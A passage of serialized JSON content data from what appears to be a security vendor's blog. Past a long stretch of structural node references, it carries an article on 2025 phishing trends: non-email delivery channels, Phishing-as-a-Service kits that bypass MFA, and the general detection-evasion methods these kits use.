value":14522,"marks":38649,"data":38650},[],{},{"nodeType":254,"data":38652,"content":38653},{},[38654],{"nodeType":178,"data":38655,"content":38656},{},[38657],{"nodeType":173,"value":14532,"marks":38658,"data":38659},[],{},{"nodeType":254,"data":38661,"content":38662},{},[38663],{"nodeType":178,"data":38664,"content":38665},{},[38666],{"nodeType":173,"value":14542,"marks":38667,"data":38668},[],{},{"nodeType":254,"data":38670,"content":38671},{},[38672],{"nodeType":178,"data":38673,"content":38674},{},[38675],{"nodeType":173,"value":14552,"marks":38676,"data":38677},[],{},{"nodeType":254,"data":38679,"content":38680},{},[38681],{"nodeType":178,"data":38682,"content":38683},{},[38684],{"nodeType":173,"value":14562,"marks":38685,"data":38686},[],{},{"nodeType":254,"data":38688,"content":38689},{},[38690],{"nodeType":178,"data":38691,"content":38692},{},[38693],{"nodeType":173,"value":14572,"marks":38694,"data":38695},[],{},{"nodeType":178,"data":38697,"content":38698},{},[38699],{"nodeType":173,"value":14579,"marks":38700,"data":38702},[38701],{"type":370},{},{"items":38704},[38705,38707],{"sys":38706,"name":509},{"id":508},{"sys":38708,"name":505},{"id":504},{"items":38710},[38711],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":38712},{"url":1496},{"__typename":1528,"sys":38714,"content":38715,"title":1480,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":39531,"authorsCollection":39537},{"id":519},{"json":38716},{"nodeType":165,"data":38717,"content":38718},{},[38719,38725,38731,38737,38740,38747,38753,38759,38764,38770,38775,38791,38797,38807,38810,38817,38823,38836,38842,38852,38857,38860,38867,38874,38879,38887,38903,38911,38917,38925,38940,38948,38954,38962,38988,38996,39002,39010,39026,39031,39039,39045,39053,39086,39089,39096,39104,39120,39128,39134,39142,39168,39173,39181,39187,39192,39195,39202,39210,39216,39267,39272,39275,39282,39290,39296,39301,39304,39311,39317,39323,39383,39389,39444,39450,39453,39460,39466,39472,39477,39480,39487,39493,39499,39505],{"nodeType":178,"data":38720,"content":38721},{},[38722],{"nodeType":173,"value":528,"marks":38723,"data":38724},[],{},{"nodeType":178,"data":38726,"content":38727},{},[38728],{"nodeType":173,"value":535,"marks":38729,"data":38730},[],{},{"nodeType":178,"data":38732,"content":38733},{},[38734],{"nodeType":173,"value":542,"marks":38735,"data":38736},[],{},{"nodeType":231,"data":38738,"content":38739},{},[],{"nodeType":169,"data":38741,"content":38742},{},[38743],{"nodeType":173,"value":552,"marks":38744,"data":38746},[38745],{"type":370},{},{"nodeType":178,"data":38748,"content":38749},{},[38750],{"nodeType":173,"value":560,"marks":38751,"data":38752},[],{},{"nodeType":178,"data":38754,"content":38755},{},[38756],{"nodeType":173,"value":567,"marks":38757,"data":38758},[],{},{"nodeType":312,"data":38760,"content":38763},{"target":38761},{"sys":38762},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":38765,"content":38766},{},[38767],{"nodeType":173,"value":580,"marks":38768,"data":38769},[],{},{"nodeType":312,"data":38771,"content":38774},{"target":38772},{"sys":38773},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":38776,"content":38777},{},[38778,38781,38788],{"nodeType":173,"value":593,"marks":38779,"data":38780},[],{},{"nodeType":186,"data":38782,"content":38783},{"uri":598},[38784],{"nodeType":173,"value":601,"marks":38785,"data":38787},[38786],{"type":194},{},{"nodeType":173,"value":606,"marks":38789,"data":38790},[],{},{"nodeType":178,"data":38792,"content":38793},{},[38794],{"nodeType":173,"value":613,"marks":38795,"data":38796},[],{},{"nodeType":178,"data":38798,"content":38799},{},[38800,38803],{"nodeType":173,"value":620,"marks":38801,"data":38802},[],{},{"nodeType":173,"value":624,"marks":38804,"data":38806},[38805],{"type":370},{},{"nodeType":231,"data":38808,"content":38809},{},[],{"nodeType":169,"data":38811,"content":38812},{},[38813],{"nodeType":173,"value":635,"marks":38814,"data":38816},[38815],{"type":370},{},{"nodeType":178,"data":38818,"content":38819},{},[38820],{"nodeType":173,"value":643,"marks":38821,"data":38822},[],{},{"nodeType":178,"data":38824,"content":38825},{},[38826,38829,38833],{"nodeType":173,"value":650,"marks":38827,"data":38828},[],{},{"nodeType":173,"value":654,"marks":38830,"data":38832},[38831],{"type":370},{},{"nodeType":173,"value":659,"marks":38834,"data":38835},[],{},{"nodeType":178,"data":38837,"content":38838},{},[38839],{"nodeType":173,"value":666,"marks":38840,"data":38841},[],{},{"nodeType":178,"data":38843,"content":38844},{},[38845,38848],{"nodeType":173,"value":673,"marks":38846,"data":38847},[],{},{"nodeType":173,"value":677,"marks":38849,"data":38851},[38850],{"type":370},{},{"nodeType":312,"data":38853,"content":38856},{"target":38854},{"sys":38855},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":38858,"content":38859},{},[],{"nodeType":169,"data":38861,"content":38862},{},[38863],{"nodeType":173,"value":694,"marks":38864,"data":38866},[38865],{"type":370},{},{"nodeType":235,"data":38868,"content":38869},{},[38870],{"nodeType":173,"value":702,"marks":38871,"data":38873},[38872],{"type":370},{},{"nodeType":312,"data":38875,"content":38878},{"target":38876},{"sys":38877},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":38880,"content":38881},{},[38882],{"nodeType":173,"value":716,"marks":38883,"data":38886},[38884,38885],{"type":370},{"type":194},{},{"nodeType":178,"data":38888,"content":38889},{},[38890,38893,38900],{"nodeType":173,"value":725,"marks":38891,"data":38892},[],{},{"nodeType":186,"data":38894,"content":38895},{"uri":730},[38896],{"nodeType":173,"value":733,"marks":38897,"data":38899},[38898],{"type":194},{},{"nodeType":173,"value":738,"marks":38901,"data":38902},[],{},{"nodeType":178,"data":38904,"content":38905},{},[38906],{"nodeType":173,"value":745,"marks":38907,"data":38910},[38908,38909],{"type":370},{"type":194},{},{"nodeType":178,"data":38912,"content":38913},{},[38914],{"nodeType":173,"value":754,"marks":38915,"data":38916},[],{},{"nodeType":178,"data":38918,"content":38919},{},[38920],{"nodeType":173,"value":761,"marks":38921,"data":38924},[38922,38923],{"type":370},{"type":194},{},{"nodeType":178,"data":38926,"content":38927},{},[38928,38931,38937],{"nodeType":173,"value":770,"marks":38929,"data":38930},[],{},{"nodeType":186,"data":38932,"content":38933},{"uri":775},[38934],{"nodeType":173,"value":778,"marks":38935,"data":38936},[],{},{"nodeType":173,"value":782,"marks":38938,"data":38939},[],{},{"nodeType":178,"data":38941,"content":38942},{},[38943],{"nodeType":173,"value":789,"marks":38944,"data":38947},[38945,38946],{"type":370},{"type":194},{},{"nodeType":178,"data":38949,"content":38950},{},[38951],{"nodeType":173,"value":798,"marks":38952,"data":38953},[],{},{"nodeType":178,"data":38955,"content":38956},{},[38957],{"nodeType":173,"value":805,"marks":38958,"data":38961},[38959,38960],{"type":370},{"type":194},{},{"nodeType":178,"data":38963,"content":38964},{},[38965,38968,38975,38978,38985],{"nodeType":173,"value":814,"marks":38966,"data":38967},[],{},{"nodeType":186,"data":38969,"content":38970},{"uri":819},[38971],{"nodeType":173,"value":822,"marks":38972,"data":38974},[38973],{"type":194},{},{"nodeType":173,"value":827,"marks":38976,"data":38977},[],{},{"nodeType":186,"data":38979,"content":38980},{"uri":832},[38981],{"nodeType":173,"value":835,"marks":38982,"data":38984},[38983],{"type":194},{},{"nodeType":173,"value":840,"marks":38986,"data":38987},[],{},{"nodeType":178,"data":38989,"content":38990},{},[38991],{"nodeType":173,"value":847,"marks":38992,"data":38995},[38993,38994],{"type":370},{"type":194},{},{"nodeType":178,"data":38997,"content":38998},{},[38999],{"nodeType":173,"value":856,"marks":39000,"data":39001},[],{},{"nodeType":178,"data":39003,"content":39004},{},[39005],{"nodeType":173,"value":863,"marks":39006,"data":39009},[39007,39008],{"type":370},{"type":194},{},{"nodeType":178,"data":39011,"content":39012},{},[39013,39016,39023],{"nodeType":173,"value":872,"marks":39014,"data":39015},[],{},{"nodeType":186,"data":39017,"content":39018},{"uri":832},[39019],{"nodeType":173,"value":835,"marks":39020,"data":39022},[39021],{"type":194},{},{"nodeType":173,"value":883,"marks":39024,"data":39025},[],{},{"nodeType":312,"data":39027,"content":39030},{"target":39028},{"sys":39029},{"id":890,"type":317,"linkType":318},[],{"nodeType":178,"data":39032,"content":39033},{},[39034],{"nodeType":173,"value":896,"marks":39035,"data":39038},[39036,39037],{"type":370},{"type":194},{},{"nodeType":178,"data":39040,"content":39041},{},[39042],{"nodeType":173,"value":905,"marks":39043,"data":39044},[],{},{"nodeType":178,"data":39046,"content":39047},{},[39048],{"nodeType":173,"value":912,"marks":39049,"data":39052},[39050,39051],{"type":370},{"type":194},{},{"nodeType":178,"data":39054,"content":39055},{},[39056,39059,39065,39068,39074,39077,39083],{"nodeType":173,"value":921,"marks":39057,"data":39058},[],{},{"nodeType":186,"data":39060,"content":39061},{"uri":926},[39062],{"nodeType":173,"value":929,"marks":39063,"data":39064},[],{},{"nodeType":173,"value":933,"marks":39066,"data":39067},[],{},{"nodeType":186,"data":39069,"content":39070},{"uri":938},[39071],{"nodeType":173,"value":941,"marks":39072,"data":39073},[],{},{"nodeType":173,"value":945,"marks":39075,"data":39076},[],{},{"nodeType":186,"data":39078,"content":39079},{"uri":950},[39080],{"nodeType":173,"value":953,"marks":39081,"data":39082},[],{},{"nodeType":173,"value":957,"marks":39084,"data":39085},[],{},{"nodeType":231,"data":39087,"content":39088},{},[],{"nodeType":235,"data":39090,"content":39091},{},[39092],{"nodeType":173,"value":967,"marks":39093,"data":39095},[39094],{"type":370},{},{"nodeType":178,"data":39097,"content":39098},{},[39099],{"nodeType":173,"value":975,"marks":39100,"data":39103},[39101,39102],{"type":370},{"type":194},{},{"nodeType":178,"data":39105,"content":39106},{},[39107,39110,39117],{"nodeType":173,"value":984,"marks":39108,"data":39109},[],{},{"nodeType":186,"data":39111,"content":39112},{"uri":989},[39113],{"nodeType":173,"value":992,"marks":39114,"data":39116},[39115],{"type":194},{},{"nodeType":173,"value":997,"marks":39118,"data":39119},[],{},{"nodeType":178,"data":39121,"content":39122},{},[39123],{"nodeType":173,"value":1004,"marks":39124,"data":39127},[39125,39126],{"type":370},{"type":194},{},{"nodeType":178,"data":39129,"content":39130},{},[39131],{"nodeType":173,"value":1013,"marks":39132,"data":39133},[],{},{"nodeType":178,"data":39135,"content":39136},{},[39137],{"nodeType":173,"value":1020,"marks":39138,"data":39141},[39139,39140],{"type":370},{"type":194},{},{"nodeType":178,"data":39143,"content":39144},{},[39145,39148,39155,39158,39165],{"nodeType":173,"value":1029,"marks":39146,"data":39147},[],{},{"nodeType":186,"data":39149,"content":39150},{"uri":1034},[39151],{"nodeType":173,"value":1037,"marks":39152,"data":39154},[39153],{"type":194},{},{"nodeType":173,"value":1042,"marks":39156,"data":39157},[],{},{"nodeType":186,"data":39159,"content":39160},{"uri":1047},[39161],{"nodeType":173,"value":1050,"marks":39162,"data":39164},[39163],{"type":194},{},{"nodeType":173,"value":1055,"marks":39166,"data":39167},[],{},{"nodeType":312,"data":39169,"content":39172},{"target":39170},{"sys":39171},{"id":1062,"type":317,"linkType":318},[],{"nodeType":178,"data":39174,"content":39175},{},[39176],{"nodeType":173,"value":1068,"marks":39177,"data":39180},[39178,39179],{"type":370},{"type":194},{},{"nodeType":178,"data":39182,"content":39183},{},[39184],{"nodeType":173,"value":1077,"marks":39185,"data":39186},[],{},{"nodeType":312,"data":39188,"content":39191},{"target":39189},{"sys":39190},{"id":1084,"type":317,"linkType":318},[],{"nodeType":231,"data":39193,"content":39194},{},[],{"nodeType":235,"data":39196,"content":39197},{},[39198],{"nodeType":173,"value":1093,"marks":39199,"data":39201},[39200],{"type":370},{},{"nodeType":178,"data":39203,"content":39204},{},[39205],{"nodeType":173,"value":1101,"marks":39206,"data":39209},[39207,39208],{"type":370},{"type":194},{},{"nodeType":178,"data":39211,"content":39212},{},[39213],{"nodeType":173,"value":1110,"marks":39214,"data":39215},[],{},{"nodeType":250,"data":39217,"content":39218},{},[39219,39232,39245],{"nodeType":254,"data":39220,"content":39221},{},[39222],{"nodeType":178,"data":39223,"content":39224},{},[39225,39229],{"nodeType":173,"value":1123,"marks":39226,"data":39228},[39227],{"type":370},{},{"nodeType":173,"value":1128,"marks":39230,"data":39231},[],{},{"nodeType":254,"data":39233,"content":39234},{},[39235],{"nodeType":178,"data":39236,"content":39237},{},[39238,39242],{"nodeType":173,"value":1138,"marks":39239,"data":39241},[39240],{"type":370},{},{"nodeType":173,"value":1143,"marks":39243,"data":39244},[],{},{"nodeType":254,"data":39246,"content":39247},{},[39248],{"nodeType":178,"data":39249,"content":39250},{},[39251,39255,39258,39264],{"nodeType":173,"value":1153,"marks":39252,"data":39254},[39253],{"type":370},{},{"nodeType":173,"value":1158,"marks":39256,"data":39257},[],{},{"nodeType":186,"data":39259,"content":39260},{"uri":1163},[39261],{"nodeType":173,"value":1166,"marks":39262,"data":39263},[],{},{"nodeType":173,"value":1170,"marks":39265,"data":39266},[],{},{"nodeType":312,"data":39268,"content":39271},{"target":39269},{"sys":39270},{"id":1177,"type":317,"linkType":318},[],{"nodeType":231,"data":39273,"content":39274},{},[],{"nodeType":235,"data":39276,"content":39277},{},[39278],{"nodeType":173,"value":1186,"marks":39279,"data":39281},[39280],{"type":370},{},{"nodeType":178,"data":39283,"content":39284},{},[39285],{"nodeType":173,"value":1194,"marks":39286,"data":39289},[39287,39288],{"type":370},{"type":194},{},{"nodeType":178,"data":39291,"content":39292},{},[39293],{"nodeType":173,"value":1203,"marks":39294,"data":39295},[],{},{"nodeType":312,"data":39297,"content":39300},{"target":39298},{"sys":39299},{"id":1210,"type":317,"linkType":318},[],{"nodeType":231,"data":39302,"content":39303},{},[],{"nodeType":169,"data":39305,"content":39306},{},[39307],{"nodeType":173,"value":1219,"marks":39308,"data":39310},[39309],{"type":370},{},{"nodeType":178,"data":39312,"content":39313},{},[39314],{"nodeType":173,"value":1227,"marks":39315,"data":39316},[],{},{"nodeType":178,"data":39318,"content":39319},{},[39320],{"nodeType":173,"value":1234,"marks":39321,"data":39322},[],{},{"nodeType":250,"data":39324,"content":39325},{},[39326,39345,39364],{"nodeType":254,"data":39327,"content":39328},{},[39329],{"nodeType":178,"data":39330,"content":39331},{},[39332,39335,39342],{"nodeType":173,"value":1247,"marks":39333,"data":39334},[],{},{"nodeType":186,"data":39336,"content":39337},{"uri":1252},[39338],{"nodeType":173,"value":1255,"marks":39339,"data":39341},[39340],{"type":194},{},{"nodeType":173,"value":1260,"marks":39343,"data":39344},[],{},{"nodeType":254,"data":39346,"content":39347},{},[39348],{"nodeType":178,"data":39349,"content":39350},{},[39351,39354,39361],{"nodeType":173,"value":1270,"marks":39352,"data":39353},[],{},{"nodeType":186,"data":39355,"content":39356},{"uri":1275},[39357],{"nodeType":173,"value":1278,"marks":39358,"data":39360},[39359],{"type":194},{},{"nodeType":173,"value":1260,"marks":39362,"data":39363},[],{},{"nodeType":254,"data":39365,"content":39366},{},[39367],{"nodeType":178,"data":39368,"content":39369},{},[39370,39373,39380],{"nodeType":173,"value":1292,"marks":39371,"data":39372},[],{},{"nodeType":186,"data":39374,"content":39375},{"uri":1297},[39376],{"nodeType":173,"value":1300,"marks":39377,"data":39379},[39378],{"type":194},{},{"nodeType":173,"value":1260,"marks":39381,"data":39382},[],{},{"nodeType":178,"data":39384,"content":39385},{},[39386],{"nodeType":173,"value":1311,"marks":39387,"data":39388},[],{},{"nodeType":250,"data":39390,"content":39391},{},[39392,39405,39418,39431],{"nodeType":254,"data":39393,"content":39394},{},[39395],{"nodeType":178,"data":39396,"content":39397},{},[39398,39402],{"nodeType":173,"value":1324,"marks":39399,"data":39401},[39400],{"type":370},{},{"nodeType":173,"value":1329,"marks":39403,"data":39404},[],{},{"nodeType":254,"data":39406,"content":39407},{},[39408],{"nodeType":178,"data":39409,"content":39410},{},[39411,39415],{"nodeType":173,"value":1339,"marks":39412,"data":39414},[39413],{"type":370},{},{"nodeType":173,"value":1344,"marks":39416,"data":39417},[],{},{"nodeType":254,"data":39419,"content":39420},{},[39421],{"nodeType":178,"data":39422,"content":39423},{},[39424,39428],{"nodeType":173,"value":1354,"marks":39425,"data":39427},[39426],{"type":370},{},{"nodeType":173,"value":1359,"marks":39429,"data":39430},[],{},{"nodeType":254,"data":39432,"content":39433},{},[39434],{"nodeType":178,"data":39435,"content":39436},{},[39437,39441],{"nodeType":173,"value":1369,"marks":39438,"data":39440},[39439],{"type":370},{},{"nodeType":173,"value":1374,"marks":39442,"data":39443},[],{},{"nodeType":178,"data":39445,"content":39446},{},[39447],{"nodeType":173,"value":1381,"marks":39448,"data":39449},[],{},{"nodeType":231,"data":39451,"content":39452},{},[],{"nodeType":169,"data":39454,"content":39455},{},[39456],{"nodeType":173,"value":1391,"marks":39457,"data":39459},[39458],{"type":370},{},{"nodeType":178,"data":39461,"content":39462},{},[39463],{"nodeType":173,"value":1399,"marks":39464,"data":39465},[],{},{"nodeType":178,"data":39467,"content":39468},{},[39469],{"nodeType":173,"value":1406,"marks":39470,"data":39471},[],{},{"nodeType":312,"data":39473,"content":39476},{"target":39474},{"sys":39475},{"id":1413,"type":317,"linkType":318},[],{"nodeType":231,"data":39478,"content":39479},{},[],{"nodeType":169,"data":39481,"content":39482},{},[39483],{"nodeType":173,"value":1422,"marks":39484,"data":39486},[39485],{"type":370},{},{"nodeType":178,"data":39488,"content":39489},{},[39490],{"nodeType":173,"value":1430,"marks":39491,"data":39492},[],{},{"nodeType":178,"data":39494,"content":39495},{},[39496],{"nodeType":173,"value":1437,"marks":39497,"data":39498},[],{},{"nodeType":178,"data":39500,"content":39501},{},[39502],{"nodeType":173,"value":1444,"marks":39503,"data":39504},[],{},{"nodeType":178,"data":39506,"content":39507},{},[39508,39511,39518,39521,39528],{"nodeType":173,"value":1451,"marks":39509,"data":39510},[],{},{"nodeType":186,"data":39512,"content":39513},{"uri":1456},[39514],{"nodeType":173,"value":1459,"marks":39515,"data":39517},[39516],{"type":194},{},{"nodeType":173,"value":1464,"marks":39519,"data":39520},[],{},{"nodeType":186,"data":39522,"content":39523},{"uri":1469},[39524],{"nodeType":173,"value":1472,"marks":39525,"data":39527},[39526],{"type":194},{},{"nodeType":173,"value":1477,"marks":39529,"data":39530},[],{},{"items":39532},[39533,39535],{"sys":39534,"name":505},{"id":504},{"sys":39536,"name":509},{"id":508},{"items":39538},[39539],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":39540},{"url":1496},{"__typename":1528,"sys":39542,"content":39544,"title":40210,"synopsis":40211,"hashTags":118,"publishedDate":40212,"slug":40213,"tagsCollection":40214,"authorsCollection":40220},{"id":39543},"5CqV6e5wfHsfEVczkWSerZ",{"json":39545},{"nodeType":165,"data":39546,"content":39547},{},[39548,39554,39561,39568,39571,39579,39586,39593,39600,39694,39700,39706,39712,39719,39726,39745,39748,39756,39763,39770,39777,39820,39827,39872,39878,39885,39892,39895,39903,39910,39917,39924,39995,40001,40007,40039,40045,40064,40070,40077,40084,40090,40093,40101,40108,40141,40148,40151,40159,40166,40173,40199,40204],{"nodeType":312,"data":39549,"content":39553},{"target":39550},{"sys":39551},{"id":39552,"type":317,"linkType":318},"1axcGwWxeKxDMk8jOWhYT6",[],{"nodeType":178,"data":39555,"content":39556},{},[39557],{"nodeType":173,"value":39558,"marks":39559,"data":39560},"2025 saw a huge amount of attacker innovation when it comes to phishing attacks, as attackers continue to double down on identity-based techniques. The continual evolution of phishing means it remains one of the most effective methods available to attackers today — in fact, it’s arguably more effective than ever. ",[],{},{"nodeType":178,"data":39562,"content":39563},{},[39564],{"nodeType":173,"value":39565,"marks":39566,"data":39567},"Let’s take a closer look at the key trends that defined phishing attacks in 2025, and what these changes mean for security teams heading into 2026. ",[],{},{"nodeType":231,"data":39569,"content":39570},{},[],{"nodeType":169,"data":39572,"content":39573},{},[39574],{"nodeType":173,"value":39575,"marks":39576,"data":39578},"#1: Phishing goes omni-channel",[39577],{"type":370},{},{"nodeType":178,"data":39580,"content":39581},{},[39582],{"nodeType":173,"value":39583,"marks":39584,"data":39585},"We’ve been talking about the rise of non-email phishing for some time now, but 2025 was the year phishing truly went omni-channel. ",[],{},{"nodeType":178,"data":39587,"content":39588},{},[39589],{"nodeType":173,"value":39590,"marks":39591,"data":39592},"Although most of the industry’s data on phishing still comes from email security vendors and tools, the picture is starting to change. Roughly 1 in 3 phishing attacks detected by Push Security were delivered outside of email. ",[],{},{"nodeType":178,"data":39594,"content":39595},{},[39596],{"nodeType":173,"value":39597,"marks":39598,"data":39599},"There are many examples of phishing campaigns operated outside of email, with LinkedIn DMs and Google Search being the top channels we identified. Notable campaigns include:",[],{},{"nodeType":250,"data":39601,"content":39602},{},[39603,39625,39647],{"nodeType":254,"data":39604,"content":39605},{},[39606],{"nodeType":178,"data":39607,"content":39608},{},[39609,39612,39621],{"nodeType":173,"value":37,"marks":39610,"data":39611},[],{},{"nodeType":186,"data":39613,"content":39615},{"uri":39614},"https://pushsecurity.com/blog/how-push-stopped-a-high-risk-linkedin-spear-phishing-attack",[39616],{"nodeType":173,"value":39617,"marks":39618,"data":39620},"A targeted campaign against tech company Exec’s",[39619],{"type":194},{},{"nodeType":173,"value":39622,"marks":39623,"data":39624}," delivered via compromised accounts on LinkedIn from other employees of the same organization, framed as an investment opportunity.",[],{},{"nodeType":254,"data":39626,"content":39627},{},[39628],{"nodeType":178,"data":39629,"content":39630},{},[39631,39634,39643],{"nodeType":173,"value":37,"marks":39632,"data":39633},[],{},{"nodeType":186,"data":39635,"content":39637},{"uri":39636},"https://pushsecurity.com/blog/new-phishing-campaign-identified-targeting-linkedin-users",[39638],{"nodeType":173,"value":39639,"marks":39640,"data":39642},"A campaign posing as a South American investment fund",[39641],{"type":194},{},{"nodeType":173,"value":39644,"marks":39645,"data":39646}," offering the opportunity to join the fund. ",[],{},{"nodeType":254,"data":39648,"content":39649},{},[39650],{"nodeType":178,"data":39651,"content":39652},{},[39653,39657,39666,39670,39678,39682,39690],{"nodeType":173,"value":39654,"marks":39655,"data":39656},"Several malvertising campaigns capturing users searching for key search terms such as “",[],{},{"nodeType":186,"data":39658,"content":39660},{"uri":39659},"https://pushsecurity.com/blog/analysing-a-malvertising-attack-targeting-business-google-accounts",[39661],{"nodeType":173,"value":39662,"marks":39663,"data":39665},"Google Ads",[39664],{"type":194},{},{"nodeType":173,"value":39667,"marks":39668,"data":39669},"”, “",[],{},{"nodeType":186,"data":39671,"content":39673},{"uri":39672},"https://pushsecurity.com/blog/analysing-a-sophisticated-google-malvertising-attack",[39674],{"nodeType":173,"value":14266,"marks":39675,"data":39677},[39676],{"type":194},{},{"nodeType":173,"value":39679,"marks":39680,"data":39681},"” and “",[],{},{"nodeType":186,"data":39683,"content":39685},{"uri":39684},"https://pushsecurity.com/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers",[39686],{"nodeType":173,"value":14290,"marks":39687,"data":39689},[39688],{"type":194},{},{"nodeType":173,"value":39691,"marks":39692,"data":39693},"”. ",[],{},{"nodeType":312,"data":39695,"content":39699},{"target":39696},{"sys":39697},{"id":39698,"type":317,"linkType":318},"3LjyZooaJQ83eJt8DRX9bP",[],{"nodeType":312,"data":39701,"content":39705},{"target":39702},{"sys":39703},{"id":39704,"type":317,"linkType":318},"644LdQYjRHerpKU5pCGv1n",[],{"nodeType":312,"data":39707,"content":39711},{"target":39708},{"sys":39709},{"id":39710,"type":317,"linkType":318},"3anCGk5A4AOVH1t9dr1xKp",[],{"nodeType":178,"data":39713,"content":39714},{},[39715],{"nodeType":173,"value":39716,"marks":39717,"data":39718},"Phishing via non-email channels has a number of advantages. With email being the best protected phishing vector, it sidesteps these controls entirely. There’s no need to build up your sender reputation, find ways to trick content analysis engines, or hope your message doesn’t end up in the spam folder.",[],{},{"nodeType":178,"data":39720,"content":39721},{},[39722],{"nodeType":173,"value":39723,"marks":39724,"data":39725},"In comparison, non-email vectors have practically no screening, your security team has no visibility, and users are less likely to anticipate possible phishing. It’s arguable that a company Exec is more likely to engage with a LinkedIn DM from a reputable account than a cold email. And social media apps do nothing to analyse messages for phishing links. (And because of the limitations of URL-based checks when it comes to today’s multi-stage phishing attacks, this would be extremely difficult even if they tried). ",[],{},{"nodeType":178,"data":39727,"content":39728},{},[39729,39733,39741],{"nodeType":173,"value":39730,"marks":39731,"data":39732},"Search engines also present a huge opportunity for attackers, whether they’re compromising existing, high reputation sites, spinning up malicious ads, or simply vibe coding their own SEO-optimised websites. This is an effective way to launch “watering hole” style attacks, casting a wide net to harvest credentials and account access that can be re-sold to other criminals for a fee, or leveraged by partners in the cybercriminal ecosystem as part of major cyber breaches (such as the recent attacks by the “",[],{},{"nodeType":186,"data":39734,"content":39736},{"uri":39735},"https://pushsecurity.com/blog/scattered-lapsus-hunters",[39737],{"nodeType":173,"value":6811,"marks":39738,"data":39740},[39739],{"type":194},{},{"nodeType":173,"value":39742,"marks":39743,"data":39744},"” criminal collective, all of which began with identity-based initial access). ",[],{},{"nodeType":231,"data":39746,"content":39747},{},[],{"nodeType":169,"data":39749,"content":39750},{},[39751],{"nodeType":173,"value":39752,"marks":39753,"data":39755},"#2: Criminal PhaaS kits dominate",[39754],{"type":370},{},{"nodeType":178,"data":39757,"content":39758},{},[39759],{"nodeType":173,"value":39760,"marks":39761,"data":39762},"The vast majority of phishing attacks today use a reverse proxy. This means they are capable of bypassing most forms of MFA because a session is created and stolen in real time as part of the attack. There is no downside to this approach compared to the basic credential phishing that was the norm more than a decade ago.",[],{},{"nodeType":178,"data":39764,"content":39765},{},[39766],{"nodeType":173,"value":39767,"marks":39768,"data":39769},"These Attacker-in-the-Middle attacks are powered by criminal Phishing-as-a-Service (PhaaS) kits such as Tycoon, NakedPages, Sneaky2FA, Flowerstorm, Salty2FA, along with various Evilginx variations (nominally a tool for red teamers, but widely used by attackers). ",[],{},{"nodeType":178,"data":39771,"content":39772},{},[39773],{"nodeType":173,"value":39774,"marks":39775,"data":39776},"PhaaS kits are incredibly important to cybercrime because they make sophisticated and continuously evolving capabilities available to the criminal marketplace, lowering the barrier to entry for criminals running advanced phishing campaigns. This is not unique to phishing: Ransomware-as-a-Service, Credential Stuffing-as-a-Service, and many more for-hire tools and services exist for criminals to use for a fee. ",[],{},{"nodeType":178,"data":39778,"content":39779},{},[39780,39784,39793,39796,39803,39807,39816],{"nodeType":173,"value":39781,"marks":39782,"data":39783},"This competitive environment has fuelled attacker innovation, resulting in an environment in which MFA-bypass is table stakes, phishing-resistant authentication is being circumvented through ",[],{},{"nodeType":186,"data":39785,"content":39787},{"uri":39786},"https://pushsecurity.com/blog/mfa-downgrade-attacks",[39788],{"nodeType":173,"value":39789,"marks":39790,"data":39792},"downgrade attacks",[39791],{"type":194},{},{"nodeType":173,"value":9534,"marks":39794,"data":39795},[],{},{"nodeType":186,"data":39797,"content":39798},{"uri":6820},[39799],{"nodeType":173,"value":8157,"marks":39800,"data":39802},[39801],{"type":194},{},{"nodeType":173,"value":39804,"marks":39805,"data":39806}," are being used to circumvent security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. It also means that when new capabilities emerge — such as ",[],{},{"nodeType":186,"data":39808,"content":39810},{"uri":39809},"https://pushsecurity.com/blog/analyzing-the-latest-sneaky2fa-phishing-page",[39811],{"nodeType":173,"value":39812,"marks":39813,"data":39815},"Browser-in-the-Browser",[39814],{"type":194},{},{"nodeType":173,"value":39817,"marks":39818,"data":39819}," — these are quickly integrated into a range of phishing kits. ",[],{},{"nodeType":178,"data":39821,"content":39822},{},[39823],{"nodeType":173,"value":39824,"marks":39825,"data":39826},"Some of the most prevalent detection evasion methods we’ve seen this year are:",[],{},{"nodeType":250,"data":39828,"content":39829},{},[39830,39840,39850],{"nodeType":254,"data":39831,"content":39832},{},[39833],{"nodeType":178,"data":39834,"content":39835},{},[39836],{"nodeType":173,"value":39837,"marks":39838,"data":39839},"Widespread use of bot protection. Every phishing page today comes with either a custom CAPTCHA or Cloudflare Turnstile (legitimate and fake versions) designed to block web-crawling security bots from being able to analyse phishing pages. ",[],{},{"nodeType":254,"data":39841,"content":39842},{},[39843],{"nodeType":178,"data":39844,"content":39845},{},[39846],{"nodeType":173,"value":39847,"marks":39848,"data":39849},"Extensive redirect chains between the initial link seeded out to the victim, and the actual malicious page hosting phishing content, designed to bury phishing sites among several legitimate pages. ",[],{},{"nodeType":254,"data":39851,"content":39852},{},[39853],{"nodeType":178,"data":39854,"content":39855},{},[39856,39860,39868],{"nodeType":173,"value":39857,"marks":39858,"data":39859},"Multi-stage page loading performed client-side via JavaScript. This means that pages are ",[],{},{"nodeType":186,"data":39861,"content":39862},{"uri":7853},[39863],{"nodeType":173,"value":39864,"marks":39865,"data":39867},"conditionally loaded",[39866],{"type":194},{},{"nodeType":173,"value":39869,"marks":39870,"data":39871},", and if conditions aren’t met, malicious content isn’t served — so the page looks clean. This also means that most of the malicious activity is happening locally, without creating web requests that can be analysed by network traffic analysis tools (e.g. web proxies). ",[],{},{"nodeType":312,"data":39873,"content":39877},{"target":39874},{"sys":39875},{"id":39876,"type":317,"linkType":318},"5LLgjhCexTYd5OlHuptv3n",[],{"nodeType":178,"data":39879,"content":39880},{},[39881],{"nodeType":173,"value":39882,"marks":39883,"data":39884},"This contributes to an environment where phishing is going undetected for extended periods of time. Even when a page is flagged, it’s trivial for attackers to dynamically serve up different phishing pages from the same benign chain of URLs used in the attack. ",[],{},{"nodeType":178,"data":39886,"content":39887},{},[39888],{"nodeType":173,"value":39889,"marks":39890,"data":39891},"This is all to say that the old-school approach to URL blocking bad sites is becoming much harder and leaves you two steps behind attackers at all times.",[],{},{"nodeType":231,"data":39893,"content":39894},{},[],{"nodeType":169,"data":39896,"content":39897},{},[39898],{"nodeType":173,"value":39899,"marks":39900,"data":39902},"#3: Attackers find ways around phishing-resistant authentication (and other security 